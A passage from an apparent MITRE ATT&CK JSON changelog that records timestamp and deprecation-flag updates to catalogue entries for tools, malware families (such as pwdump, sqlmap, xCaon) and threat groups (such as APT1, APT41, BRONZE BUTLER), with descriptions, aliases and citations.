"source_name": "OSX/MacDownloader", + "description": "(Citation: objsee mac malware 2017)." + }, + { + "source_name": "objsee mac malware 2017", + "description": "Patrick Wardle. (n.d.). Mac Malware of 2017. 
Retrieved September 21, 2018.", + "url": "https://objective-see.com/blog/blog_0x25.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "iKitten", + "OSX/MacDownloader" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:56.342000+00:00\", \"old_value\": \"2025-04-16 20:38:00.655000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "tool", + "id": "tool--362dc67f-4e85-4562-9dac-1b6b7f3ec4b5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:03.377000+00:00", + "modified": "2025-04-25 14:45:17.053000+00:00", + "name": "ifconfig", + "description": "[ifconfig](https://attack.mitre.org/software/S0101) is a Unix-based utility used to gather information about and interact with the TCP/IP settings on a system. (Citation: Wikipedia Ifconfig)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0101", + "external_id": "S0101" + }, + { + "source_name": "Wikipedia Ifconfig", + "description": "Wikipedia. (2016, January 26). ifconfig. 
Retrieved April 17, 2016.", + "url": "https://en.wikipedia.org/wiki/Ifconfig" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:17.053000+00:00\", \"old_value\": \"2025-04-16 20:38:51.252000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "tool", + "id": "tool--65370d0b-3bd4-4653-8cf9-daf56f6be830", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:45:20.648000+00:00", + "name": "meek", + "description": "[meek](https://attack.mitre.org/software/S0175) is an open-source Tor plugin that tunnels Tor traffic through HTTPS connections.", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0175", + "external_id": "S0175" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "meek" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:20.648000+00:00\", \"old_value\": \"2025-04-16 20:38:52.775000+00:00\"}}}", + "previous_version": "1.0" + }, + { 
+ "type": "tool", + "id": "tool--b35068ec-107a-4266-bda8-eb7036267aea", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:03.773000+00:00", + "modified": "2025-04-25 14:45:26.343000+00:00", + "name": "nbtstat", + "description": "[nbtstat](https://attack.mitre.org/software/S0102) is a utility used to troubleshoot NetBIOS name resolution. (Citation: TechNet Nbtstat)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0102", + "external_id": "S0102" + }, + { + "source_name": "TechNet Nbtstat", + "description": "Microsoft. (n.d.). Nbtstat. Retrieved April 17, 2016.", + "url": "https://technet.microsoft.com/en-us/library/cc940106.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:26.343000+00:00\", \"old_value\": \"2025-04-16 20:38:55.076000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--800bdfba-6d66-480f-9f45-15845c05cb5d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:44.700000+00:00", + "modified": "2025-04-25 14:43:52.893000+00:00", + "name": "pngdowner", + "description": "[pngdowner](https://attack.mitre.org/software/S0067) is malware used by [Putter Panda](https://attack.mitre.org/groups/G0024). It is a simple tool with limited functionality and no persistence mechanism, suggesting it is used only as a simple \"download-and-\nexecute\" utility. 
(Citation: CrowdStrike Putter Panda)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0067", + "external_id": "S0067" + }, + { + "source_name": "CrowdStrike Putter Panda", + "description": "Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. Retrieved January 22, 2016.", + "url": "http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "pngdowner" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:52.893000+00:00\", \"old_value\": \"2025-04-16 20:38:20.185000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "tool", + "id": "tool--9de2308e-7bed-43a3-8e58-f194b3586700", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:13.051000+00:00", + "modified": "2025-04-25 14:45:24.744000+00:00", + "name": "pwdump", + "description": "[pwdump](https://attack.mitre.org/software/S0006) is a credential dumper. (Citation: Wikipedia pwdump)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0006", + "external_id": "S0006" + }, + { + "source_name": "Wikipedia pwdump", + "description": "Wikipedia. (2007, August 9). pwdump. 
Retrieved June 22, 2016.", + "url": "https://en.wikipedia.org/wiki/Pwdump" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "pwdump" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:24.744000+00:00\", \"old_value\": \"2025-04-16 20:38:54.480000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "tool", + "id": "tool--33b9e38f-103c-412d-bdcf-904a91fff1e4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-04-18 17:59:24.739000+00:00", + "modified": "2025-04-25 14:45:16.528000+00:00", + "name": "spwebmember", + "description": "[spwebmember](https://attack.mitre.org/software/S0227) is a Microsoft SharePoint enumeration and data dumping tool written in .NET. (Citation: NCC Group APT15 Alive and Strong)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0227", + "external_id": "S0227" + }, + { + "source_name": "spwebmember", + "description": "(Citation: NCC Group APT15 Alive and Strong)" + }, + { + "source_name": "NCC Group APT15 Alive and Strong", + "description": "Smallridge, R. (2018, March 10). APT15 is alive and strong: An analysis of RoyalCli and RoyalDNS. 
Retrieved April 4, 2018.", + "url": "https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "spwebmember" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:16.528000+00:00\", \"old_value\": \"2025-04-16 20:38:51.100000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "tool", + "id": "tool--9a2640c2-9f43-46fe-b13f-bde881e55555", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-04-18 17:59:24.739000+00:00", + "modified": "2025-04-25 14:45:24.383000+00:00", + "name": "sqlmap", + "description": "[sqlmap](https://attack.mitre.org/software/S0225) is an open source penetration testing tool that can be used to automate the process of detecting and exploiting SQL injection flaws. (Citation: sqlmap Introduction)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0225", + "external_id": "S0225" + }, + { + "source_name": "sqlmap Introduction", + "description": "Damele, B., Stampar, M. (n.d.). sqlmap. 
Retrieved March 19, 2018.", + "url": "http://sqlmap.org/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:24.383000+00:00\", \"old_value\": \"2025-04-16 20:38:54.328000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--21583311-6321-4891-8a37-3eb4e57b0fb1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-09-29 00:04:26.906000+00:00", + "modified": "2025-04-25 14:42:49.417000+00:00", + "name": "xCaon", + "description": "[xCaon](https://attack.mitre.org/software/S0653) is an HTTP variant of the [BoxCaon](https://attack.mitre.org/software/S0651) malware family that has used by [IndigoZebra](https://attack.mitre.org/groups/G0136) since at least 2014. [xCaon](https://attack.mitre.org/software/S0653) has been used to target political entities in Central Asia, including Kyrgyzstan and Uzbekistan.(Citation: Checkpoint IndigoZebra July 2021)(Citation: Securelist APT Trends Q2 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0653", + "external_id": "S0653" + }, + { + "source_name": "xCaon", + "description": "(Citation: Checkpoint IndigoZebra July 2021)" + }, + { + "source_name": "Checkpoint IndigoZebra July 2021", + "description": "CheckPoint Research. (2021, July 1). IndigoZebra APT continues to attack Central Asia with evolving tools. 
Retrieved September 24, 2021.", + "url": "https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/" + }, + { + "source_name": "Securelist APT Trends Q2 2017", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2017, August 8). APT Trends report Q2 2017. Retrieved February 15, 2018.", + "url": "https://securelist.com/apt-trends-report-q2-2017/79332/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "xCaon" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Pooja Natarajan, NEC Corporation India", + "Yoshihiro Kori, NEC Corporation", + "Manikantan Srinivasan, NEC Corporation India" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:49.417000+00:00\", \"old_value\": \"2025-04-16 20:37:58.030000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "tool", + "id": "tool--4fa49fc0-9162-4bdb-a37e-7aa3dcb6d38b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:11.941000+00:00", + "modified": "2025-04-25 14:45:18.852000+00:00", + "name": "xCmd", + "description": "[xCmd](https://attack.mitre.org/software/S0123) is an open source tool that is similar to [PsExec](https://attack.mitre.org/software/S0029) and allows the user to execute applications on remote systems. 
(Citation: xCmd)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0123", + "external_id": "S0123" + }, + { + "source_name": "xCmd", + "description": "Rayaprolu, A.. (2011, April 12). xCmd an Alternative to PsExec. Retrieved August 10, 2016.", + "url": "https://ashwinrayaprolu.wordpress.com/2011/04/12/xcmd-an-alternative-to-psexec/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:18.852000+00:00\", \"old_value\": \"2025-04-16 20:38:51.879000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--0817aaf2-afea-4c32-9285-4dcd1df5bf14", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:42:35.950000+00:00", + "name": "yty", + "description": "[yty](https://attack.mitre.org/software/S0248) is a modular, plugin-based malware framework. The components of the framework are written in a variety of programming languages. (Citation: ASERT Donot March 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0248", + "external_id": "S0248" + }, + { + "source_name": "yty", + "description": "(Citation: ASERT Donot March 2018)" + }, + { + "source_name": "ASERT Donot March 2018", + "description": "Schwarz, D., Sopko J. (2018, March 08). 
Donot Team Leverages New Modular Malware Framework in South Asia. Retrieved June 11, 2018.", + "url": "https://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "yty" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:35.950000+00:00\", \"old_value\": \"2025-04-16 20:37:53.646000+00:00\"}}}", + "previous_version": "1.2" + } + ], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "groups": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [ + { + "type": "intrusion-set", + "id": "intrusion-set--c4d50cdf-87ce-407d-86d8-862883485842", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-05 18:53:08.166000+00:00", + "modified": "2025-04-25 14:49:32.503000+00:00", + "name": "APT-C-36", + "description": "[APT-C-36](https://attack.mitre.org/groups/G0099) is a suspected South America espionage group that has been active since at least 2018. 
The group mainly targets Colombian government institutions as well as important corporations in the financial sector, petroleum industry, and professional manufacturing.(Citation: QiAnXin APT-C-36 Feb2019)", + "aliases": [ + "APT-C-36", + "Blind Eagle" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0099", + "external_id": "G0099" + }, + { + "source_name": "Blind Eagle", + "description": "(Citation: QiAnXin APT-C-36 Feb2019)" + }, + { + "source_name": "QiAnXin APT-C-36 Feb2019", + "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020.", + "url": "https://web.archive.org/web/20190625182633if_/https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Jose Luis S\u00e1nchez Martinez" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:32.503000+00:00\", \"old_value\": \"2025-04-16 20:37:39.643000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:31:47.955000+00:00", + "modified": "2025-04-25 14:49:20.672000+00:00", + "name": "APT1", + "description": "[APT1](https://attack.mitre.org/groups/G0006) is a Chinese threat group that has 
been attributed to the 2nd Bureau of the People\u2019s Liberation Army (PLA) General Staff Department\u2019s (GSD) 3rd Department, commonly known by its Military Unit Cover Designator (MUCD) as Unit 61398. (Citation: Mandiant APT1)", + "aliases": [ + "APT1", + "Comment Crew", + "Comment Group", + "Comment Panda" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0006", + "external_id": "G0006" + }, + { + "source_name": "APT1", + "description": "(Citation: Mandiant APT1)" + }, + { + "source_name": "Comment Crew", + "description": "(Citation: Mandiant APT1)" + }, + { + "source_name": "Comment Group", + "description": "(Citation: Mandiant APT1)" + }, + { + "source_name": "Comment Panda", + "description": "(Citation: CrowdStrike Putter Panda)" + }, + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + }, + { + "source_name": "CrowdStrike Putter Panda", + "description": "Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. 
Retrieved January 22, 2016.", + "url": "http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.4", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:20.672000+00:00\", \"old_value\": \"2025-04-16 20:37:37.426000+00:00\"}}}", + "previous_version": "1.4" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--c47f937f-1022-4f42-8525-e7a4779a14cb", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:31:47.537000+00:00", + "modified": "2025-04-25 14:49:18.305000+00:00", + "name": "APT12", + "description": "[APT12](https://attack.mitre.org/groups/G0005) is a threat group that has been attributed to China. 
The group has targeted a variety of victims including but not limited to media outlets, high-tech companies, and multiple governments.(Citation: Meyers Numbered Panda)", + "aliases": [ + "APT12", + "IXESHE", + "DynCalc", + "Numbered Panda", + "DNSCALC" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0005", + "external_id": "G0005" + }, + { + "source_name": "APT12", + "description": "(Citation: Meyers Numbered Panda) (Citation: Moran 2014)" + }, + { + "source_name": "IXESHE", + "description": "(Citation: Meyers Numbered Panda) (Citation: Moran 2014)" + }, + { + "source_name": "DynCalc", + "description": "(Citation: Meyers Numbered Panda) (Citation: Moran 2014)" + }, + { + "source_name": "Numbered Panda", + "description": "(Citation: Meyers Numbered Panda)" + }, + { + "source_name": "DNSCALC", + "description": "(Citation: Moran 2014)" + }, + { + "source_name": "Meyers Numbered Panda", + "description": "Meyers, A. (2013, March 29). Whois Numbered Panda. Retrieved January 14, 2016.", + "url": "http://www.crowdstrike.com/blog/whois-numbered-panda/" + }, + { + "source_name": "Moran 2014", + "description": "Moran, N., Oppenheim, M., Engle, S., & Wartell, R.. (2014, September 3). Darwin\u2019s Favorite APT Group [Blog]. 
Retrieved November 12, 2014.", + "url": "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "2.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:18.305000+00:00\", \"old_value\": \"2025-04-16 20:37:37.119000+00:00\"}}}", + "previous_version": "2.1" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-09-23 13:43:36.945000+00:00", + "modified": "2025-04-22 21:56:33.318000+00:00", + "name": "APT41", + "description": "[APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting various industries, including but not limited to healthcare, telecom, technology, finance, education, retail and video game industries in 14 countries.(Citation: apt41_mandiant) Notable behaviors include using a wide range of malware and tools to complete mission objectives. 
[APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)\n", + "aliases": [ + "APT41", + "Wicked Panda", + "Brass Typhoon", + "BARIUM" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0096", + "external_id": "G0096" + }, + { + "source_name": "Wicked Panda", + "description": "(Citation: Crowdstrike GTR2020 Mar 2020)" + }, + { + "source_name": "APT41", + "description": "(Citation: FireEye APT41 2019)" + }, + { + "source_name": "Brass Typhoon", + "description": "(Citation: Microsoft Threat Actor Naming July 2023)" + }, + { + "source_name": "BARIUM", + "description": "(Citation: Microsoft Threat Actor Naming July 2023)" + }, + { + "source_name": "Crowdstrike GTR2020 Mar 2020", + "description": "Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.", + "url": "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf" + }, + { + "source_name": "FireEye APT41 2019", + "description": "FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.", + "url": "https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf" + }, + { + "source_name": "FireEye APT41 Aug 2019", + "description": "Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.", + "url": "https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf" + }, + { + "source_name": "apt41_mandiant", + "description": "Mandiant. (n.d.). APT41, A DUAL ESPIONAGE AND CYBER CRIME OPERATION. 
Retrieved June 11, 2024.", + "url": "https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf" + }, + { + "source_name": "Microsoft Threat Actor Naming July 2023", + "description": "Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.", + "url": "https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide" + }, + { + "source_name": "Group IB APT 41 June 2021", + "description": "Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.", + "url": "https://www.group-ib.com/blog/colunmtk-apt41/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Kyaw Pyiyt Htet, @KyawPyiytHtet", + "Nikita Rostovcev, Group-IB" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "4.1", + "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-22 21:56:33.318000+00:00\", \"old_value\": \"2024-10-10 14:31:35.326000+00:00\"}}}", + "previous_version": "4.1" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:48:57.719000+00:00", + "name": "BRONZE BUTLER", + "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) is a cyber espionage group with likely Chinese origins that has been active since at least 2008. 
The group primarily targets Japanese organizations, particularly those in government, biotechnology, electronics manufacturing, and industrial chemistry.(Citation: Trend Micro Daserf Nov 2017)(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Trend Micro Tick November 2019)", + "aliases": [ + "BRONZE BUTLER", + "REDBALDKNIGHT", + "Tick" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0060", + "external_id": "G0060" + }, + { + "source_name": "BRONZE BUTLER", + "description": "(Citation: Trend Micro Daserf Nov 2017)(Citation: Trend Micro Tick November 2019)" + }, + { + "source_name": "REDBALDKNIGHT", + "description": "(Citation: Trend Micro Daserf Nov 2017)(Citation: Trend Micro Tick November 2019)" + }, + { + "source_name": "Tick", + "description": "(Citation: Trend Micro Daserf Nov 2017)(Citation: Symantec Tick Apr 2016)(Citation: Trend Micro Tick November 2019)" + }, + { + "source_name": "Trend Micro Daserf Nov 2017", + "description": "Chen, J. and Hsieh, M. (2017, November 7). REDBALDKNIGHT/BRONZE BUTLER\u2019s Daserf Backdoor Now Using Steganography. Retrieved December 27, 2017.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/" + }, + { + "source_name": "Secureworks BRONZE BUTLER Oct 2017", + "description": "Counter Threat Unit Research Team. (2017, October 12). BRONZE BUTLER Targets Japanese Enterprises. Retrieved January 4, 2018.", + "url": 